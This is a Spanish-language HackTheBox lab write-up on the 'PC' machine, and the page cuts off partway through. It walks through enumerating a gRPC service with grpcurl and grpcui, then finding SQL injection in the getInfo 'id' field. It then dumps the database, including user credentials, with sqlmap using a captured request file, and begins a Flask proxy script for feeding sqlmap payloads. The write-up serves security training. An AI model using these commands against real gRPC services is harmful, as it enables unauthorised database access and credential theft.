<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="google-translate-customization" content="108d9124921d80c3-80e20d618ff053c8-g4f02ec6f3dba68b7-c">
<!-- Begin Jekyll SEO tag v2.8.0 -->
<title>HackTheBox PC - SQL injection in gRPC service | c4rta</title>
<meta name="generator" content="Jekyll v4.3.2">
<meta property="og:title" content="HackTheBox PC - SQL injection in gRPC service">
<meta name="author" content="c4rta">
<meta property="og:locale" content="en_US">
<meta name="description" content="Esta es una maquina bien interesante por que no tiene puerto 80, asi que descubrimeros el puerto 50051 el cual esta siendo usado por gRPC, despues usaremos un cliente gRPC para ver un poco como se estan estructurando los protobof, con base a las respuestas de las peticiones, haremos un SQL injection en el parametro ID. Para la escalada haremos un port forwarding y explotaremos una vulnerabilidad en pyLoad.">
<meta property="og:description" content="Esta es una maquina bien interesante por que no tiene puerto 80, asi que descubrimeros el puerto 50051 el cual esta siendo usado por gRPC, despues usaremos un cliente gRPC para ver un poco como se estan estructurando los protobof, con base a las respuestas de las peticiones, haremos un SQL injection en el parametro ID. Para la escalada haremos un port forwarding y explotaremos una vulnerabilidad en pyLoad.">
<link rel="canonical" href="https://ic4rta.github.io//hackthebox/2023/05/23/htb-pc.html">
<meta property="og:url" content="https://ic4rta.github.io//hackthebox/2023/05/23/htb-pc.html">
<meta property="og:site_name" content="c4rta">
<meta property="og:type" content="article">
<meta property="article:published_time" content="2023-05-23T00:00:00+00:00">
<meta name="twitter:card" content="summary">
<meta property="twitter:title" content="HackTheBox PC - SQL injection in gRPC service">
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"c4rta"},"dateModified":"2023-05-23T00:00:00+00:00","datePublished":"2023-05-23T00:00:00+00:00","description":"Esta es una maquina bien interesante por que no tiene puerto 80, asi que descubrimeros el puerto 50051 el cual esta siendo usado por gRPC, despues usaremos un cliente gRPC para ver un poco como se estan estructurando los protobof, con base a las respuestas de las peticiones, haremos un SQL injection en el parametro ID. Para la escalada haremos un port forwarding y explotaremos una vulnerabilidad en pyLoad.","headline":"HackTheBox PC - SQL injection in gRPC service","mainEntityOfPage":{"@type":"WebPage","@id":"https://ic4rta.github.io//hackthebox/2023/05/23/htb-pc.html"},"url":"https://ic4rta.github.io//hackthebox/2023/05/23/htb-pc.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="shortcut icon" href="/favicon.png">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-noto-sans@0.0.72/index.min.css">
  <link rel="stylesheet" href="/assets/css/main.css">
  <script src="/assets/js/main.js"></script>
  <link rel="stylesheet" href="/assets/css/syntax.css">
<link type="application/atom+xml" rel="alternate" href="https://ic4rta.github.io//feed.xml" title="c4rta">
<script>
  function initGoogleAnalytics() {
    var doNotTrack = (window.doNotTrack === "1" || navigator.doNotTrack === "1" ||
      navigator.doNotTrack === "yes" || navigator.msDoNotTrack === "1");
    var enableDNT = "true" == "true";

    if (!enableDNT || !doNotTrack) {
      (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
          m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
      })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

      ga('create', 'UA-212989441-1', 'auto');
      ga('send', 'pageview');
    }
  }
  window.addEventListener("load", initGoogleAnalytics);
</script>
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/11.8.0/styles/default.min.css">
<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/11.8.0/highlight.min.js"></script>
<!-- and it's easy to individually load additional languages -->
<script charset="UTF-8" src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.8.0/languages/go.min.js"></script>




  
      <!-- [function][get_value] true -->
  






  
      <!-- [function][get_value] #fff -->
  






  
      <!-- [function][get_value] #ff4e00 -->
  






  
      <!-- [function][get_value] uppercase -->
  

<script>
// Init highlight js
document.addEventListener('DOMContentLoaded', function(event) {
  var els = document.querySelectorAll('pre code')

  function addLangData(block) {
    var outer = block.parentElement.parentElement.parentElement;
    var lang = block.getAttribute('data-lang');
    for (var i = 0; i < outer.classList.length; i++) {
      var cls = outer.classList[i];
      if (cls.startsWith('language-')) {
        lang = cls;
        break;
      }
    }
    if (!lang) {
      cls = block.getAttribute('class');
      lang = cls ? cls.replace('hljs ', '') : '';
    }
    if (lang.startsWith('language-')) {
      lang = lang.substr(9);
    }
    block.setAttribute('class', 'hljs ' + lang);
    block.parentNode.setAttribute('data-lang', lang);
  }

  function addBadge(block) {
    var enabled = ('true' || 'true').toLowerCase();
    if (enabled == 'true') {
      var pre = block.parentElement;
      pre.classList.add('badge');
    }
  }

  function handle(block) {
    addLangData(block);
    addBadge(block)
    hljs.highlightBlock(block);
  }

  for (var i = 0; i < els.length; i++) {
    var el = els[i];
    handle(el);
  }
});
</script>

<style>
  /* code language badge */
  pre.badge::before {
    content: attr(data-lang);
    color: #fff;
    background-color: #ff4e00;
    padding: 0 .5em;
    border-radius: 0 2px;
    text-transform: uppercase;
    text-align: center;
    min-width: 32px;
    display: inline-block;
    position: absolute;
    right: 0;
  }

  /* fix wrong badge display for firefox browser */
  code > table pre::before {
    display: none;
  }
</style>

</head>
<body>




  
      <!-- [function][get_value] uppercase -->
  






  
      <!-- [function][get_value] {"image"=>"./assets/images/home/home-t.png", "opacity"=>0.618, "background"=>"#000", "height"=>"50vh", "min_height"=>"50vh", "heading_style"=>"font-size: 2.25em; font-weight: bold; ", "subheading_style"=>"color: gold"} -->
  






  
      <!-- [function][get_value] {"image"=>"./assets/images/home/home-t.png", "opacity"=>0.618, "background"=>"#000", "height"=>"50vh", "min_height"=>"50vh", "heading_style"=>"font-size: 2.25em; font-weight: bold; ", "subheading_style"=>"color: gold"} -->
  






  
      <!-- [function][get_value] ./assets/images/home/home-t.png -->
  






  
      <!-- [function][get_value] ./assets/images/home/home-t.png -->
  






  
      <!-- [function][get_value] #000 -->
  






  
      <!-- [function][get_value] #000 -->
  






  
      <!-- [function][get_value] 0.618 -->
  






  
      <!-- [function][get_value] 0.618 -->
  






  
      <!-- [function][get_value] 50vh -->
  






  
      <!-- [function][get_value] 50vh -->
  






  
      <!-- [function][get_value] 50vh -->
  






  
      <!-- [function][get_value] 50vh -->
  






  
      <!-- [function][get_value] font-size: 2.25em; font-weight: bold;  -->
  






  
      <!-- [function][get_value] font-size: 2.25em; font-weight: bold;  -->
  






  
      <!-- [function][get_value] color: gold -->
  






  
      <!-- [function][get_value] color: gold -->
  






  
      <!-- [function][get_value]  -->
  






  
      <!-- [function][get_value]  -->
  






  
      <!-- [function][get_value] true -->
  






  
      <!-- [function][get_value] true -->
  






  
      <!-- [function][get_value] 0 -->
  






  
      <!-- [function][get_value] 0 -->
  






  
      <!-- [function][get_value] 0 -->
  










  
      <!-- [function][get_value] 0 -->
  






  
      <!-- [function][get_value] true -->
  

<header class="site-header site-header-transparent" role="banner">

  <div class="wrapper">    
    <div class="site-header-inner">
<span class="site-brand"><a class="site-brand-inner" rel="author" href="/">
  <img class="site-favicon" title="c4rta" src="/favicon.png" onerror="this.style.display='none'">
  c4rta
</a>
</span><nav class="site-nav">
          <input type="checkbox" id="nav-trigger" class="nav-trigger">
          <label for="nav-trigger">
            <span class="menu-icon">
              <svg viewbox="0 0 18 15" width="18px" height="15px">
                <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"></path>
              </svg>
            </span>
          </label>      
          <div class="trigger">
<a class="page-link" href="/">Home</a><a class="page-link" href="/categories.html">Categorias</a><a class="page-link" href="/tags.html">Etiquetas</a><a class="page-link" href="/about.html">Sobre Mi</a><a class="page-link" href="https://github.com/ic4rta" target="_blank"><img src="https://img.shields.io/badge/github-%23121011.svg?style=for-the-badge&logo=github&logoColor=white" alt="GitHub"></a>
            <a class="page-link" href="http://twitter.com/_c4rta_" target="_blank"><img src="https://img.shields.io/badge/Twitter%20-%230077B5.svg?&style=for-the-badge&logo=Twitter&logoColor=white%22" alt="Twitter"></a>




  
      <!-- [function][get_value] [] -->
  

</div>
        </nav>
</div>
  </div>

</header>

<!-- 页面菜单栏 注释=固定/不注释=隐藏 -->

<script>
  function initHeader() {
    var lastScrollY = getScrollPos().y;
    var documentElement = document.documentElement;

    function storeScrollData() {
      var y = getScrollPos().y;documentElement.setAttribute("data-header-transparent", "");var scrollStatus = "";

      if (y <= 0) {
        scrollStatus = "top";
      } else if ((window.innerHeight + y) >= document.body.offsetHeight) {
        scrollStatus = "bottom";
      } else {
        var isScrollDown = (y - lastScrollY > 0) ? true : false;
        scrollStatus = isScrollDown ? "down" : "up";
      }

      lastScrollY = y;
      documentElement.setAttribute("data-scroll-status", scrollStatus);
    }

    window.addEventListener('scroll', function(e) {
      storeScrollData();
    });

    storeScrollData();
  }
  document.addEventListener('DOMContentLoaded', initHeader);
</script>

<!-- 页面菜单栏 注释=固定/不注释=隐藏 -->





  
      <!-- [function][get_value] [] -->
  






  
      <!-- [function][get_value] post-header.html -->
  






  
      <!-- [function][get_value] post-header.html -->
  






  
      <!-- [function][get_value]  -->
  






  
      <!-- [function][get_value]  -->
  






  
      <!-- [function][get_value]  -->
  






  
      <!-- [function][get_value]  -->
  






  
      <!-- [function][get_value] {"image"=>"./assets/images/home/home-t.png", "opacity"=>0.618, "background"=>"#000", "height"=>"50vh", "min_height"=>"50vh", "heading_style"=>"font-size: 2.25em; font-weight: bold; ", "subheading_style"=>"color: gold"} -->
  






  
      <!-- [function][get_value] {"image"=>"./assets/images/home/home-t.png", "opacity"=>0.618, "background"=>"#000", "height"=>"50vh", "min_height"=>"50vh", "heading_style"=>"font-size: 2.25em; font-weight: bold; ", "subheading_style"=>"color: gold"} -->
  






  
      <!-- [function][get_value] ./assets/images/home/home-t.png -->
  






  
      <!-- [function][get_value] ./assets/images/home/home-t.png -->
  






  
      <!-- [function][get_value] #000 -->
  






  
      <!-- [function][get_value] #000 -->
  






  
      <!-- [function][get_value] 0.618 -->
  






  
      <!-- [function][get_value] 0.618 -->
  






  
      <!-- [function][get_value] 50vh -->
  






  
      <!-- [function][get_value] 50vh -->
  






  
      <!-- [function][get_value] 50vh -->
  






  
      <!-- [function][get_value] 50vh -->
  






  
      <!-- [function][get_value] font-size: 2.25em; font-weight: bold;  -->
  






  
      <!-- [function][get_value] font-size: 2.25em; font-weight: bold;  -->
  






  
      <!-- [function][get_value] color: gold -->
  






  
      <!-- [function][get_value] color: gold -->
  






  
      <!-- [function][get_value]  -->
  






  
      <!-- [function][get_value]  -->
  






  
      <!-- [function][get_value] true -->
  






  
      <!-- [function][get_value] true -->
  






  
      <!-- [function][get_value] 0 -->
  






  
      <!-- [function][get_value] 0 -->
  






  
      <!-- [function][get_value] 0 -->
  





<style>
    html .page-banner {
      background: #000;
    }
  </style>
<style>html .page-banner {
      height:  18.4vh;
      min-height: 50vh;
    }
    html[data-scroll-status="top"] .page-banner {
      height: 50vh;
    }
  </style>
<style>
    html .page-banner .page-banner-img > *:first-child {
      opacity: 0.618;
    }

    html[data-theme="dark"] .page-banner .page-banner-img > *:first-child {
      opacity: 0.443724;
    }
  </style>
<style>
    html .page-banner .page-banner-inner > *:first-child > *:nth-child(1) {
      font-size: 2.25em; font-weight: bold; 
    }
  </style>
<style>
    html .page-banner .page-banner-inner > *:first-child > *:nth-child(2) {
      color: gold
    }
  </style>
<section class="page-banner">
    <div class="page-banner-img">
<div style="background-image: url(/assets/images/home/home-t.png)"></div>
        <img class="img-placeholder" src="/assets/images/home/home-t.png">
</div>
    <div class="wrapper">
      <div class="page-banner-inner">
<header class="post-header">
  <h1 class="post-title p-name" itemprop="name headline">HackTheBox PC - SQL injection in gRPC service</h1>
  <h2 class="post-subtitle"></h2>

  <p class="post-meta">
    <time class="dt-published" datetime="2023-05-23T00:00:00+00:00" itemprop="datePublished"><i class="fa fa-calendar"></i> May 23, 2023
    </time>

    
    

















  
      <!-- [function][get_article_words] 1649 -->
  
















    <span class="post-reading-time left-vsplit"><i class="fa fa-clock-o"></i> About 10 mins</span>
  </p>
<div class="post-tags">
<a class="post-tag" href="/tags.html#SQL%20injection">#SQL injection</a><a class="post-tag" href="/tags.html#gRPC">#gRPC</a>
</div></header>
</div>
    </div>
  </section><script>
  function hashLocate(hashValue) {
    hashValue = hashValue.replace(/^.*#h-/, '');
    hashValue = decodeURIComponent(hashValue);
    var element = document.getElementById(hashValue);

    if (!element) {
      return;
    }

    var header = document.querySelector('header.site-header');
    var headerRect = header.getBoundingClientRect();
    var headerTop = Math.floor(headerRect.top);
    var headerHeight = Math.floor(headerRect.height);
    var scrollPos = getScrollPos();
    var offsetY = element.offsetTop - (headerTop + headerHeight + 20);

    if (offsetY == scrollPos.y) {
      return;
    }

    if (headerTop == 0  && offsetY > scrollPos.y) {
      offsetY += headerHeight + 2;
    } else if (headerTop < 0  && offsetY < scrollPos.y) {
      offsetY -= headerHeight - 2;
    }

    smoothScrollTo(offsetY);
  }

  // The first event occurred
  window.addEventListener('load', function(event) {
    if (window.location.hash) {
      hashLocate(window.location.hash);
    }
  });

  // The first event occurred
  window.addEventListener('click', function(event) {
    if (event.target.tagName.toLowerCase() == 'a') {
      hashLocate(event.target.getAttribute('href'));
    }
  });
</script>
<div class="theme-toggle">
  <input type="checkbox" id="theme-switch">
  <label for="theme-switch">
    <div class="toggle"></div>
    <div class="names">
      <p class="light">Light</p>
      <p class="dark">Dark</p>
    </div>
  </label>
</div>




  
      <!-- [function][get_value] auto -->
  

<script>
  (function() {
    var sw = document.getElementById('theme-switch');
    var html = document.getElementsByTagName('html')[0];
    var nightModeOption = ('auto' || 'auto').toLowerCase();
    var storage = nightModeOption === 'manual'
        ? localStorage
        : sessionStorage;
    var themeData = loadThemeData();

    function saveThemeData(data) {
      storage.setItem('theme', JSON.stringify(data));
    }

    function loadThemeData() {
      var data = storage.getItem('theme');
      try {
        data = JSON.parse(data ? data : '');
      } catch(e) {
        data = { nightShift: undefined, autoToggleAt: 0 };
        saveThemeData(data);
      }
      return data;
    }

    function handleThemeToggle(nightShift) {
      themeData.nightShift = nightShift;
      saveThemeData(themeData);
      html.dataset.theme = nightShift ? 'dark' : 'light';
      setTimeout(function() {
        sw.checked = nightShift ? true : false;
      }, 50);
    }

    function autoThemeToggle() {
      // Next time point of theme toggle
      var now = new Date();
      var toggleAt = new Date();
      var hours = now.getHours();
      var nightShift = hours >= 19 || hours <=7;

      if (nightShift) {
        if (hours > 7) {
          toggleAt.setDate(toggleAt.getDate() + 1);
        }
        toggleAt.setHours(7);
      } else {
        toggleAt.setHours(19);
      }

      toggleAt.setMinutes(0);
      toggleAt.setSeconds(0);
      toggleAt.setMilliseconds(0)

      var delay = toggleAt.getTime() - now.getTime();

      // auto toggle theme mode
      setTimeout(function() {
        handleThemeToggle(!nightShift);
      }, delay);

      return {
        nightShift: nightShift,
        toggleAt: toggleAt.getTime()
      };
    }

    // Listen the theme toggle event
    sw.addEventListener('change', function(event) {
      handleThemeToggle(event.target.checked);
    });

    if (nightModeOption == 'auto') {
      var data = autoThemeToggle();

      // Toggle theme by local setting
      if (data.toggleAt > themeData.autoToggleAt) {
        themeData.autoToggleAt = data.toggleAt;
        handleThemeToggle(data.nightShift);
      } else {
        handleThemeToggle(themeData.nightShift);
      }
    } else if (nightModeOption == 'manual') {
      handleThemeToggle(themeData.nightShift);
    } else {
      var nightShift = themeData.nightShift;
      if (nightShift === undefined) {
        nightShift = nightModeOption === 'on';
      }
      handleThemeToggle(nightShift);
    }
  })();
</script>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <div class="framework">
  <section class="main">

     <div class="post">
  <section>




  
      <!-- [function][get_value] {"image"=>"./assets/images/home/home-t.png", "opacity"=>0.618, "background"=>"#000", "height"=>"50vh", "min_height"=>"50vh", "heading_style"=>"font-size: 2.25em; font-weight: bold; ", "subheading_style"=>"color: gold"} -->
  






  
      <!-- [function][get_value] [] -->
  

<article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

    <div class="post-content e-content" itemprop="articleBody">

      <p>Esta es una maquina bien interesante por que no tiene puerto 80, asi que descubrimeros el puerto 50051 el cual esta siendo usado por gRPC, despues usaremos un cliente gRPC para ver un poco como se estan estructurando los protobof, con base a las respuestas de las peticiones, haremos un SQL injection en el parametro ID. Para la escalada haremos un port forwarding y explotaremos una vulnerabilidad en pyLoad.</p>

<h2 class="lead" id="enumeracion">Enumeracion</h2>

<p>Iniciamos con un escaneo con:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo nmap -sS -n -Pn --open -p- 10.129.93.244
</code></pre></div></div>

<ul>
  <li>
    <p>sS: haga un TCP SYN Scan el cual hace que el destino responda con un RST si el puerto esta cerrado, o con un SYN/ACK si esta abierto, y ademas para que vaya mas rapido</p>
  </li>
  <li>
    <p>n: para que no haga resolucion DNS y tarde menos el escaneo</p>
  </li>
  <li>
    <p>Pn: para evitar el descubrimiento de hosts</p>
  </li>
  <li>
    <p>open: para que solo muestre los puertos abiertos</p>
  </li>
  <li>
    <p>-p-: para que escanee todo el rango de puertos</p>
  </li>
</ul>

<p>Y nos reporto que hay varios puertos abiertos:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PORT      STATE SERVICE
22/tcp    open  ssh
50051/tcp open  unknown
</code></pre></div></div>

<p>Les adelanto que si buscamos por versiones y servicios tampoco vamos a encontrar nada, asi que pasamos directamente a buscar en google</p>

<h3 id="puerto-50051">Puerto 50051</h3>

<p>Al hacer unas busquedas como <code class="language-plaintext highlighter-rouge">50051 port</code> y <code class="language-plaintext highlighter-rouge">50051 pentesting</code> es cuando encuentro que corresponde a gRPC, asi que existe un servidor gRPC en la maquina, antes que nada, vamos a ver que es gRPC</p>

<h3 id="grpc">gRPC</h3>

<p>gRPC es una implementacion de RPC (Protocolo de llamada a procedimiento remoto) el cuale es usado en aplicaciones cliente-servidor, este funciona de esta forma:</p>

<p><img src="/assets/img/PC/grpc.png" alt=""></p>

<center>imagen de grpc.io</center>

<p>Primeramente se debe de tener creado un servidor gRPC con un servicio creado en un lenguaje compatible con gRPC, en esa imagen es C++, despues para interactuar con ese servicio se usa un cliente gRPC stub, donde stub no es mas que nada una funcionalidad encargada de serializar los datos que se envian al servidor, en una arquitectura gRPC se hace uso de algo que se llama Protocol Buffers, que es un mecanismo para serializar datos estructurados, cuando se hace una peticion, esto datos pueden ir en JSON</p>

<h3 id="interactuando-con-el-servidor-grpc">Interactuando con el servidor gRPC</h3>

<p>Una vez sabiendo que existe un servidor gRPC en la maquina, necesitamos un cliente o al menos algo para realizar peticiones hacia ese servidor, aqui encontre dos: <code class="language-plaintext highlighter-rouge">grpcurl</code> y <code class="language-plaintext highlighter-rouge">grpcui</code>, usaremos ambas:</p>

<ul>
  <li>grpcurl: <a href="https://github.com/fullstorydev/grpcurl">https://github.com/fullstorydev/grpcur</a>
</li>
  <li>grpcui: <a href="https://github.com/fullstorydev/grpcui">https://github.com/fullstorydev/grpcur</a>
</li>
</ul>

<p>Usare gprcurl guiandome de aca: <a href="https://notes.akenofu.me/Network%20Pen%20test/gRPC/">https://notes.akenofu.me/Network%20Pen%20test/gRPC/</a></p>

<p>Primero listare los servicios expuestos por el servidor gRPC:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>grpcurl -plaintext 10.129.93.244:50051 list
</code></pre></div></div>
<p>Esto nos arroja:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SimpleApp
grpc.reflection.v1alpha.ServerReflection
</code></pre></div></div>

<p>El unico que nos interesa es el primero, pero antes… Debo de decir que en un servicio gRPC existen metodos con los cuales podemos realizar peticiones hacia ese servicio para que haga cosas que esten previamente definidas</p>

<p>Para listar los metodos es asi:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>grpcurl -plaintext 10.129.93.244:50051 list SimpleApp
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SimpleApp.LoginUser
SimpleApp.RegisterUser
SimpleApp.getInfo
</code></pre></div></div>
<p>Vemos que existen 3 metodos, esos metodos tiene mas definiciones por dentro, que son los mecanismos protobuf asi que usaremos el comando:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>grpcurl -plaintext 10.129.93.244:50051 describe SimpleApp
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SimpleApp is a service:
service SimpleApp {
  rpc LoginUser ( .LoginUserRequest ) returns ( .LoginUserResponse );
  rpc RegisterUser ( .RegisterUserRequest ) returns ( .RegisterUserResponse );
  rpc getInfo ( .getInfoRequest ) returns ( .getInfoResponse );
}
</code></pre></div></div>

<p>Y vemos que para el metodo <code class="language-plaintext highlighter-rouge">LoginUser</code> existe <code class="language-plaintext highlighter-rouge">.LoginUserRequest</code> y <code class="language-plaintext highlighter-rouge">.LoginUserResponse</code></p>

<p>Ahora si queremos ver la definición de un protobuf usamos el comando:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>grpcurl -plaintext 10.129.93.244:50051 describe LoginUserRequest
</code></pre></div></div>

<p>Y podemos ver la definicion:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>LoginUserRequest is a message:
message LoginUserRequest {
  string username = 1;
  string password = 2;
}
</code></pre></div></div>

<p>Y vemos que tiene definido un nombre y contraseña, así que cuando se use el metodo de LoginUser estara esperando por un nombre y una contraseña.</p>

<p>Para no hacerlo tan largo, tenemos que nos podemos iniciar sesion, registrar y otro metodo que nos da una pequeña info, aremos los pasos en este orden para luego analizar una peticion</p>

<ul>
  <li>Registrarse</li>
  <li>Iniciar sesion</li>
  <li>Mostrar info</li>
</ul>

<p>Te dejo los comando de como Registrarse, iniciar sesion y mostrar info usando grpcurl</p>

<ul>
  <li>
    <p>Registro: <code class="language-plaintext highlighter-rouge">grpcurl -plaintext -d '{"username":"c4rta", "password":"12345"}' 10.129.93.244:50051 SimpleApp.RegisterUser</code></p>
  </li>
  <li>
    <p>Login: <code class="language-plaintext highlighter-rouge">grpcurl -plaintext -d '{"username":"c4rta", "password":"12345"}' -v 10.129.93.244:50051 SimpleApp.LoginUser</code>
Esto arroja esto:</p>
  </li>
</ul>

<p><img src="/assets/img/PC/grpc2.png" alt=""></p>

<ul>
  <li>Mostrar info:
<code class="language-plaintext highlighter-rouge">grpcurl -plaintext -d '{"id":"784"}' -rpc-header 'token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYzRydGEiLCJleHAiOjE2ODQ5NjM2OTV9.9ocP1Hq9USx
UAv_2BVxRFWLN8vDzlVxrkbiklyoU9ow' 10.129.93.244:50051 SimpleApp.getInfo
</code>
</li>
</ul>

<p>Debes de indicarle el ID y tu JWT.</p>

<p>Ahora si podemos pasar a la explotacion donde te mostrate 2 formas de hacerlo</p>

<h3 id="1-sql-injection-gprcui-y-sqlmap--r">1. SQL injection, gprcui y sqlmap -r</h3>

<p>grpcui es un cliente gRPC similar a grpcurl, pero este tiene interfaz grafica, primero nos debemos de conectar al servidor gRPC:</p>

<p><code class="language-plaintext highlighter-rouge">grpcui -plaintext &lt;IP&gt;:50051</code></p>

<p>Esto nos abrira una web con las mismas funcionalidades que hicimos con grpcurl.</p>

<p>Primero creamos un usuario y esto nos debe de salir:</p>

<p><img src="/assets/img/PC/grpc3.png" alt=""></p>

<p>Ahora iniciamos sesion con ese usuario vamos a poder su JWK:</p>

<p><img src="/assets/img/PC/grpc4.png" alt=""></p>

<p>Ahora usaremos esos datos para mostrar la info del usuario que acabamos de crear, pero esta vez interceptaremos la peticion con burp:</p>

<p><img src="/assets/img/PC/grpc5.png" alt=""></p>

<p>Podemos ver que en la parte de <code class="language-plaintext highlighter-rouge">data</code> se le esta pasando nuestro ID y el servidor nos responde esto:</p>

<p><img src="/assets/img/PC/grpc6.png" alt=""></p>

<p>Aqui empece a buscar las diferentes vulnerabilidades que pueden a ver en gRPC y encontre este blog <a href="https://www.trendmicro.com/en_us/research/20/h/how-unsecure-grpc-implementations-can-compromise-apis.html">https://www.trendmicro.com/en_us/research/20/h/how-unsecure-grpc-implementations-can-compromise-apis.html</a>, en una parte habla de SQLi, asi que como la data que esta tramitando es al id, entonces decidi probar injectiones en ese campo</p>

<p>Primero puse una comilla al final del ID:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"data":[
  {
    "id":"738'"
  }
</code></pre></div></div>
<p>Y eso me dio un error:</p>

<p><img src="/assets/img/PC/grpc7.png" alt=""></p>

<p>Seguramente el gestor de base de datos detecto un error en la consulta y arrojo eso, es posible que haya una SQLi, asi que probare con sqlmap.
Tomando en cuenta que no tenemos un servidor web como tal, entonces debemos de guardar la peticion que interceptamos con burp y usando el argumento -r de sqlmap, podemos hacerlo, este es el archivo de mi peticion:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>POST /invoke/SimpleApp.getInfo HTTP/1.1
Host: 127.0.0.1:36401
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
x-grpcui-csrf-token: h000rrAARGYkr4dDDax5sQUcnTmszKcRiLhk-0Aep-k
X-Requested-With: XMLHttpRequest
Content-Length: 194
Origin: http://127.0.0.1:36401
Connection: close
Referer: http://127.0.0.1:36401/
Cookie: csrftoken=dv1RLiX7MBGMrZhvyWH0W4U4HIgJZdFp; _grpcui_csrf_token=h000rrAARGYkr4dDDax5sQUcnTmszKcRiLhk-0Aep-k
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYzRydGEiLCJleHAiOjE2ODQ5ODYwNDZ9.BVAx_9R6Cch8vwCUHknTLBm9l0wukqMrsy9TJcsGlJE"}],"data":[{"id":"738"}]}
</code></pre></div></div>
<p>Y el comando de sql map es:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sqlmap -r "$(pwd)/peticion" -level 5 --risk 3 --batch --dump
</code></pre></div></div>

<p>Eso automaticamente nos sacara todas las tablas, columnas, e informacion en ellas, ahi podremos ver un usuario y contraseñas</p>

<p><img src="/assets/img/PC/sql1.png" alt=""></p>

<p><img src="/assets/img/PC/sql2.png" alt=""></p>

<h3 id="2-sql-injection-con-sqlmap-simulando-un-proxy">2. SQL injection con sqlmap simulando un proxy</h3>

<p>(la idea de la solucion no es mia, <strong><code class="language-plaintext highlighter-rouge">Tysm to Cack for giving me the idea</code></strong>)</p>

<p>Basicamente es levantar un servidor web con python, el cual actua como proxy, y que travez de un parametro recibira el payload de sqlmap. Este actuaria entre sqlmap y el servidor gRPC, el codigo al que llegue es:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="n">subprocess</span>
<span class="kn">import</span> <span class="n">json</span>
<span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span>

<span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span>

<span class="nd">@app.route</span><span class="p">(</span><span class="sh">'</span><span class="s">/payload</span><span class="sh">'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">ctrl_payload</span><span class="p">():</span>
    <span class="n">payload</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">p</span><span class="sh">'</span><span class="p">)</span>
    <span class="n">payload</span> <span class="o">=</span> <span class="n">payload</span><span class="p">.</span><span class="nf">replace</span><span class="p">(</span><span class="sh">'"'</span><span class="p">,</span> <span class="sh">"'"</span><span class="p">)</span>
    <span class="n">payload</span> <span class="o">=</span> <span class="sh">'</span><span class="s">{</span><span class="sh">"</span><span class="s">id</span><span class="sh">"</span><span class="s">: </span><span class="sh">"'</span> <span class="o">+</span> <span class="n">payload</span> <span class="o">+</span> <span class="sh">'"</span><span class="s">}</span><span class="sh">'</span>
    <span class="nf">print</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
